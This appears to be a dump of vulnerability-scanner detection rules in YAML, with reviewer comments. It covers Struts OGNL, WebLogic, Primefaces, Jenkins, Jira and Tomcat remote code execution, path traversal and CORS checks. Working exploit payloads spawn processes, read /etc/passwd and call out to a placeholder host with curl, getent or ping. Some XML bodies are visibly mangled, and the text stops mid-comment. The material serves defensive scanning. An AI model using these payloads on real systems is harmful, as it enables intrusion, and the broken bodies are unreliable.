├── CORS-Header-Origin:Referer-Reflect.yaml ├── CVE-2013-2251.yaml ├── CVE-2017-1000486_Primefaces_RCE.yaml ├── CVE-2017-10271.yaml ├── CVE-2017-12611.yaml ├── CVE-2017-3506.yaml ├── CVE-2017-5638.yaml ├── CVE-2017-9791.yaml ├── CVE-2017-9805.yaml ├── CVE-2018-1000861.yaml ├── CVE-2018-11776.yaml ├── CVE-2018-18778-mini_httpd_ptrav.yaml ├── CVE-2019-0232.yaml ├── CVE-2019-11581.yaml ├── CVE-2019-15107.yaml ├── CVE-2019-16759.yaml ├── CVE-2019-19781-Citrix-ADC-Netscaler.yaml ├── CVE-2019-2725.yaml ├── CVE-2019-3396.yaml ├── CVE-2019-5418.yaml ├── CVE-2019-8451.yaml ├── CVE-2020-14882_WebLogic_RCE.yaml ├── CVE-2020-5902_F5_BIG-IP.yaml ├── CVE-2021-44228_Log4j_rce.yaml ├── CVE-2021-44228_Log4j_ssti.yaml ├── ImageTragick.yaml ├── Insecure-cross-domain-policy.yaml ├── LDAPi-error-based.yaml ├── LFI-windows-prefix.yaml ├── LFI-windows-replace.yaml ├── README.md ├── SVN-Data-Leak.yaml ├── Sandbox-bypass-in-Jenkins.yaml ├── Symfony-debug-panel.yaml ├── Tango-REST-Misconfiguration.yaml ├── apache-server-status.yaml ├── apache-tapestry.yaml ├── apache-tomcat-misconfiguration.yaml ├── app-errors.yaml ├── bak-files.yaml ├── command-injection-linux.yaml ├── command-injection-windows.yaml ├── crlf.yaml ├── directory-listing.yaml ├── django_nginx_alias_traversal.yaml ├── expression-language-injection.yaml ├── ffmpeg-uploads.yaml ├── git-log-output.yaml ├── git.yaml ├── graphql.yaml ├── httpoxy.yaml ├── java-web-inf-parameter.yaml ├── java-web-inf-uri.yaml ├── jenkins-pre-auth.yaml ├── laravel-debugger.yaml ├── memstats.yaml ├── nginx-server-status.yaml ├── nosqli.yaml ├── ntfs-alternative-streams.yaml ├── open-redirect.yaml ├── path-traversal-append.yaml ├── path-traversal-replace.yaml ├── php-data.yaml ├── php-rce.yaml ├── php_wrappers.yaml ├── phpinfo.yaml ├── public-docker-registry.yaml ├── public-jolokia-jmx.yaml ├── pyyaml-deserialization.yaml ├── rce-dotnet-jackson.yaml ├── remote-file-inclusion.yaml ├── shellshock.yaml ├── spel-oob.yaml ├── splunkd-xml-feed.yaml ├── 
spring-cloud-infoleaks.yaml ├── sqli-error-based.yaml ├── ssh-keys.yaml ├── ssrf-rechecker-lfi.yaml ├── ssrf-rechecker-oob.yaml ├── ssrf.yaml ├── ssti.yaml ├── stored-xss-oob.yaml ├── telerik-infoleaks.yaml ├── vBulletin_CVE-2020-12720.yaml ├── weak-basic-auth.yaml ├── xss-html-injections.yaml ├── xss-oob.yaml ├── xxe.yaml ├── yii-debugger.yaml └── yii2-gii.yml
/CORS-Header-Origin:Referer-Reflect.yaml:
--------------------------------------------------------------------------------
# CORS reflection check. STR_MARKER is inserted into the Origin and Referer
# request headers using three insertion methods (postfix, prefix, replace).
# The response is then inspected for an Access-Control-Allow-Origin header that
# carries the marker or `*`, and for the marker in the body.
# NOTE(review): how the detect entries combine (any vs. all) is decided by the
# scanner and is not visible in this file.
# NOTE(review): Access-Control-Allow-Credentials is not inspected here. A
# reflected origin matters most when credentials are also allowed, so findings
# need triage before they are treated as exploitable.
collect:
  - uniq:
    - [ URI ]

generate:
  - into:
    - HEADER_ORIGIN
    - HEADER_REFERER
  - payload:
    - STR_MARKER
  - method:
    - postfix
    - prefix
    - replace

detect:
  - response:
    - headers:
      - 'Access-Control-Allow-Origin': 'STR_MARKER'
      - 'Access-Control-Allow-Origin': '\*'
    - body: 'STR_MARKER'

meta-info:
  - type: info
  - applicable_for:
    - fast
  - threat: 30
  - tags:
    - CORS
    - Cross-Origin Resource Sharing
    - Header Origin/Referer Reflect

--------------------------------------------------------------------------------
/CVE-2013-2251.yaml:
--------------------------------------------------------------------------------
# Apache Struts CVE-2013-2251 check. Applies only to requests whose action
# extension matches 'action'; the POST insertion point is replaced with a
# `redirect:` / `redirectAction:` expression that starts a process resolving
# DNS_MARKER.
# Detection is out-of-band only (oob: dns): presumably a hit is reported when
# the scanner observes a DNS query for DNS_MARKER, so a vulnerable host that
# cannot resolve external names would be missed - confirm against the scanner
# documentation.
# NOTE(review): the second payload passes '-n 1' as one argument after the host
# name; confirm the ping variant still triggers a lookup on the intended
# platform.
collect:
  - uniq:
    - [ URI ]

match:
  - "ACTION_EXT_value": 'action'

generate:
  - into:
    - POST
  - payload:
    - "redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'getent','hosts','DNS_MARKER'})).start()}"
    - "redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'ping','DNS_MARKER', '-n 1'})).start()}"
  - method:
    - replace

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 90
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2013-2251
    - Apache Struts 2.0.0 through 2.3.15

--------------------------------------------------------------------------------
/CVE-2017-1000486_Primefaces_RCE.yaml:
-------------------------------------------------------------------------------- 1 | send: 2 | - method: 'GET' 3 | url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=cat%20/etc/passwd&ln=primefaces&pfdri\ 4 | d=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lvBxR9XlJ\ 5 | NxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50id6wTK\ 6 | 6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl0OGoX\ 7 | sH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrStfCPG\ 8 | s1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4emCKv\ 9 | Bz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9QpyTG\ 10 | Mya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6X\ 11 | 8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\ 12 | PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\ 13 | 9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LIm\ 14 | NLdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUf\ 15 | t/BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmG\ 16 | ZqykJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8e\ 17 | npl0ytV74kU5W0Zs+LuZjldi9oATW4Zj6w==" 18 | 19 | - method: 'GET' 20 | url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=getent%20hosts%20DNS_MARKER&ln=primefa\ 21 | 
ces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8l\ 22 | vBxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq5\ 23 | 0id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQX\ 24 | l0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrS\ 25 | tfCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4e\ 26 | mCKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qp\ 27 | yTGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j\ 28 | 6X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tD\ 29 | iPnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\ 30 | 9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImN\ 31 | LdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/\ 32 | BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqy\ 33 | kJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0\ 34 | ytV74kU5W0Zs+LuZjldi9oATW4Zj6w==" 35 | 36 | - method: 'GET' 37 | url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=ping%20-n%201%20DNS_MARKER&ln=primefac\ 38 | es&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lv\ 39 | BxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50\ 40 | 
id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl\ 41 | 0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrSt\ 42 | fCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4em\ 43 | CKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qpy\ 44 | TGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6\ 45 | X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\ 46 | PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE9\ 47 | W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImNL\ 48 | djV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/B\ 49 | rEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqyk\ 50 | J7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0y\ 51 | tV74kU5W0Zs+LuZjldi9oATW4Zj6w==" 52 | 53 | detect: 54 | - oob: 55 | - dns 56 | - response: 57 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*' 58 | 59 | meta-info: 60 | - title: "CVE-2017-1000486 Primetek Primefaces 5.x remote code execution" 61 | - description: "The vulnerability is due to weak encryption flaw and hardcoded encryption password. As a result, the malicious user may make remote code execution (RCE) via a simple HTTP call." 
62 | - type: rce 63 | - threat: 98 64 | - tags: 65 | - Primetek Primefaces 5.x 66 | - CVE-2017-1000486 67 |
--------------------------------------------------------------------------------
/CVE-2017-10271.yaml:
--------------------------------------------------------------------------------
# Oracle WebLogic CVE-2017-10271 check: two POSTs to
# /wls-wsat/CoordinatorPortType, one per platform (a /bin/sh `getent hosts`
# form and a cmd `ping -n 1` form). Detection is out-of-band only (oob: dns):
# presumably a hit means the scanner saw a DNS query for DNS_MARKER, so hosts
# without outbound name resolution would be missed - confirm.
# NOTE(review): Content-Type is text/xml but the body values below contain no
# XML markup; the markup appears to have been lost when this page was captured.
# Take the bodies from the upstream rule file, not from this listing.
send:
  - method: 'POST'
    url: '/wls-wsat/CoordinatorPortType'
    headers:
      - CONTENT-TYPE: text/xml
    body: '/bin/sh-cgetent hosts DNS_MARKER'

  - method: 'POST'
    url: '/wls-wsat/CoordinatorPortType'
    headers:
      - CONTENT-TYPE: text/xml
    body: 'cmd/cping -n 1 DNS_MARKER'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 75
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - CVE-2017-10271
    - Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.1 and 12.2.1.2

--------------------------------------------------------------------------------
/CVE-2017-12611.yaml:
--------------------------------------------------------------------------------
# Apache Struts CVE-2017-12611 check on the GET insertion point, with two
# payloads: the first starts a platform-specific command that resolves
# DNS_MARKER, the second asks the application to add an X-WLRM-VLN-CHECK
# response header carrying STR_MARKER. The detect section lists the matching
# out-of-band DNS signal and the response-header signal.
# The header variant gives an in-band signal, which helps where the target has
# no outbound DNS.
collect:
  - uniq:
    - [ URI ]

generate:
  - into:
    - GET
  - payload:
    - "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"

    - "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"

  - method:
    - replace

detect:
  - oob:
    - dns
  - response:
    - headers:
      - "X-WLRM-VLN-CHECK": STR_MARKER

meta-info:
  - type: rce
  - threat: 90
  - applicable_for: ["attack_rechecker"]
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2017-12611
    - Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10

--------------------------------------------------------------------------------
/CVE-2017-3506.yaml:
--------------------------------------------------------------------------------
# Oracle WebLogic CVE-2017-3506 check against /wls-wsat/CoordinatorPortType,
# detected through an out-of-band DNS lookup of DNS_MARKER.
# NOTE(review): as shown on this page the two requests are textually identical
# to those in CVE-2017-10271.yaml, but the bodies have lost their XML markup,
# so the real difference between the two rules is not visible here.
send:
  - method: 'POST'
    url: '/wls-wsat/CoordinatorPortType'
    headers:
      - CONTENT-TYPE: text/xml
    body: '/bin/sh-cgetent hosts DNS_MARKER'

  - method: 'POST'
    url: '/wls-wsat/CoordinatorPortType'
    headers:
      - CONTENT-TYPE: text/xml
    body: 'cmd/cping -n 1 DNS_MARKER'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 74
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - CVE-2017-3506
    - Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2

--------------------------------------------------------------------------------
/CVE-2017-5638.yaml:
--------------------------------------------------------------------------------
# Apache Struts 2 CVE-2017-5638 check: two POSTs to '/' whose Content-Type
# header holds the expression; both end in `curl http://DNS_MARKER`. The
# detect section is out-of-band DNS only.
# NOTE(review): both variants depend on `curl` being present on the target,
# whereas other rules in this collection use getent/ping; a vulnerable host
# without curl would presumably not be flagged.
# The trailing backslashes are YAML double-quoted line continuations; each
# header value is a single logical string.
send:
  - method: 'POST'
    url: '/'
    headers:
      - CONTENT-TYPE: "%{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBE\
          R_ACCESS).(@java.lang.Runtime@getRuntime().exec('curl http://DNS_MARKER'))}"

  - method: 'POST'
    url: '/'
    headers:
      - CONTENT-TYPE: "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(\
          #_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionCo\
          ntext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil\
          @class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clea\
          r()).(#context.setMemberAccess(#dm)))).(#cmd='curl http://DNS_MARKER').(#iswin=(@java.lang.\
          System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c\
          ',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErro\
          rStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getRes\
          ponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),\
          #ros)).(#ros.flush())}"

detect:
  - oob:
    - dns
meta-info:
  - type: rce
  - threat: 100
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Remote Code Execution
    - CVE-2017-5638
    - Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1

--------------------------------------------------------------------------------
/CVE-2017-9791.yaml:
--------------------------------------------------------------------------------
# Apache Struts CVE-2017-9791 check on the POST insertion point. Same
# two-signal design as CVE-2017-12611.yaml: one payload resolves DNS_MARKER
# through a platform-specific command, the other adds an X-WLRM-VLN-CHECK
# response header carrying STR_MARKER.
collect:
  - uniq:
    - [ URI ]

generate:
  - into:
    - POST
  - payload:

    - "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ping -n 1 DNS_MARKER'}:{'/bin/sh','-c','getent hosts DNS_MARKER'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    - "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-WLRM-VLN-CHECK','STR_MARKER')}.multipart/form-data"

  - method:
    - replace

detect:
  - oob:
    - dns
  - response:
    - headers:
      - "X-WLRM-VLN-CHECK": STR_MARKER

meta-info:
  - type: rce
  - threat: 90
  - applicable_for: ["attack_rechecker"]
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2017-9791
    - Apache Struts 2.3.x

--------------------------------------------------------------------------------
/CVE-2017-9805.yaml:
--------------------------------------------------------------------------------
# Apache Struts CVE-2017-9805 check: two POSTs to '/' with Content-Type
# application/xml, detected through an out-of-band DNS lookup of DNS_MARKER.
# NOTE(review): the body values contain no XML markup; it appears to have been
# lost when this page was captured, so the bodies cannot be used as shown.
# NOTE(review): the second body runs `ping` through /bin/sh with no count
# option. On Linux that does not stop on its own, so a positive result may
# leave a process running on the tested host; a bounded lookup such as the
# `getent hosts` form used by other rules avoids that.
send:
  - method: 'POST'
    url: '/'
    headers:
      - CONTENT-TYPE: application/xml
    body: '0false0/bin/sh-ccurl DNS_MARKER falsejava.lang.ProcessBuilderstartfoofoofalse00falsefalse0'

  - method: 'POST'
    url: '/'
    headers:
      - CONTENT-TYPE: application/xml
    body: '0false0/bin/sh-cping DNS_MARKER falsejava.lang.ProcessBuilderstartfoofoofalse00falsefalse0'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 81
  - applicable_for:
    - fast
    - scanner
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2017-9805
    - Apache Struts2
    - Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13
--------------------------------------------------------------------------------
/CVE-2018-1000861.yaml:
--------------------------------------------------------------------------------
# Jenkins CVE-2018-1000861 check: a single unauthenticated GET to the
# SecureGroovyScript checkScript descriptor under /securityRealm/user/admin/,
# carrying a class whose constructor runs `getent hosts DNS_MARKER`.
# Detection is out-of-band DNS only; only a Unix-style command is sent, so a
# Windows-hosted controller would presumably not be flagged by this rule.
send:
  - method: 'GET'
    url: '/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){"getent%20hosts%20DNS_MARKER".execute()}}'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 90
  - applicable_for:
    - fast
  - tags:
    - RCE
    - CVE-2018-1000861
    - Jenkins Authentication/ACL bypass

--------------------------------------------------------------------------------
/CVE-2018-11776.yaml:
--------------------------------------------------------------------------------
# Apache Struts CVE-2018-11776 check on the PATH insertion point, for requests
# whose action extension matches 'action'. Three payloads map to three
# signals: `curl DNS_MARKER` (out-of-band DNS), `echo STR_MARKER` (marker in
# the body) and `${CALC_MARKER}` (CALC_MARKER in the body).
# NOTE(review): the second payload itself contains STR_MARKER, so an
# application that merely echoes the request path (for example in an error
# page) could satisfy the body match without evaluating anything - confirm
# how the scanner substitutes and compares the marker.
collect:
  - uniq:
    - [ URI ]
match:
  - "ACTION_EXT_value": 'action'
generate:
  - into:
    - PATH
  - payload:
    - "${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec\
      ('curl DNS_MARKER').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.Bu\
      fferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionC\
      ontext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}"

    - "${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec\
      ('echo STR_MARKER').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.Bu\
      fferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionC\
      ontext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}"

    - '${CALC_MARKER}'
  - method:
    - replace
detect:
  - oob:
    - dns
  - response:
    - body: STR_MARKER
    - body: CALC_MARKER
meta-info:
  - type: rce
  - threat: 90
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Remote Code Execution
    - CVE-2018-11776
    - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16

--------------------------------------------------------------------------------
/CVE-2018-18778-mini_httpd_ptrav.yaml:
--------------------------------------------------------------------------------
#Attention! For this DSL detect you must use a custom test policy with URI_.* insertion point!
# ACME mini_httpd file-read check: GET /etc/passwd with an empty Host header,
# flagged when the response body contains a passwd-format line.
# NOTE(review): the body pattern is unanchored and every field uses `*`, so it
# accepts any text with the right colon/slash layout; this is a low but
# non-zero false-positive risk on pages that print similar strings.
send:
  - method: 'GET'
    url: '/etc/passwd'
    headers:
      - 'Host': ''
detect:
  - response:
    - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'

meta-info:
  - title: "ACME mini_httpd directory traversal"
  - description: "ACME mini_httpd before 1.30 lets remote users read arbitrary files."
  - type: "ptrav"
  - threat: 65
  - applicable_for:
    - fast
    - scanner
  - tags:
    - Path Traversal
    - Arbitrary File Reading

--------------------------------------------------------------------------------
/CVE-2019-0232.yaml:
--------------------------------------------------------------------------------
# Apache Tomcat CVE-2019-0232 check: for requests whose extension ends in
# bat or cmd, appends '?&set' / '?&dir' to the URI and looks for typical
# output of those Windows commands in the response body.
# NOTE(review): `set` and `dir` print one item per line, so the `.*` joins
# below match only if the scanner's regex engine lets `.` span newlines -
# confirm, otherwise these patterns would miss real hits.
# NOTE(review): `into: URI` is a scalar here while other rules use a list;
# presumably both forms are accepted.
match:
  - ACTION_EXT_value: '(bat$)|(cmd$)'
generate:
  - into: URI
  - payload:
    - '?&set'
    - '?&dir'
  - method:
    - postfix
detect:
  - response:
    - body: '(COMSPEC).*(REMOTE_ADDR).*(REMOTE_HOST)'
    - body: '(Volume in drive).*(Directory of)'
    - body: '(HOMEDRIVE).*(SystemDrive).*(NUMBER_OF_PROCESSORS)'
meta-info:
  - type: rce
  - threat: 90
  - applicable_for:
    - fast
  - tags:
    - CVE-2019-0232
    - Remote Code Execution
    - RCE
    - Apache Tomcat
--------------------------------------------------------------------------------
/CVE-2019-11581.yaml:
--------------------------------------------------------------------------------
# Atlassian Jira CVE-2019-11581 check: applies to the ContactAdministrators
# .jspa action, forces a form-urlencoded Content-Type, and replaces the POST
# insertion point with a template expression that runs
# `getent hosts DNS_MARKER`. Detection is out-of-band DNS only; only a
# Unix-style command is sent.
collect:
  - uniq:
    - [ URI ]

match:
  - "ACTION_NAME_value": 'ContactAdministrators'
  - "ACTION_EXT_value": 'jspa'

modify:
  - "HEADER_CONTENT-TYPE_value": "application/x-www-form-urlencoded"

generate:
  - into:
    - POST
  - payload:
    - "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('getent hosts DNS_MARKER').waitFor()"
  - method:
    - replace

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - applicable_for: ["fast"]
  - threat: 90
  - tags:
    - RCE
    - Remote Code Execution
    - CVE-2019-11581
    - Atlassian Jira

--------------------------------------------------------------------------------
/CVE-2019-15107.yaml:
--------------------------------------------------------------------------------
# Webmin CVE-2019-15107 check: POST to /password_change.cgi with a command
# appended to the `old` field; detected through an out-of-band DNS lookup of
# DNS_MARKER.
# NOTE(review): Host and Referer are hard-coded to 127.0.0.1 (port 10000 in
# the Referer) - presumably to satisfy a referer check; confirm the scanner
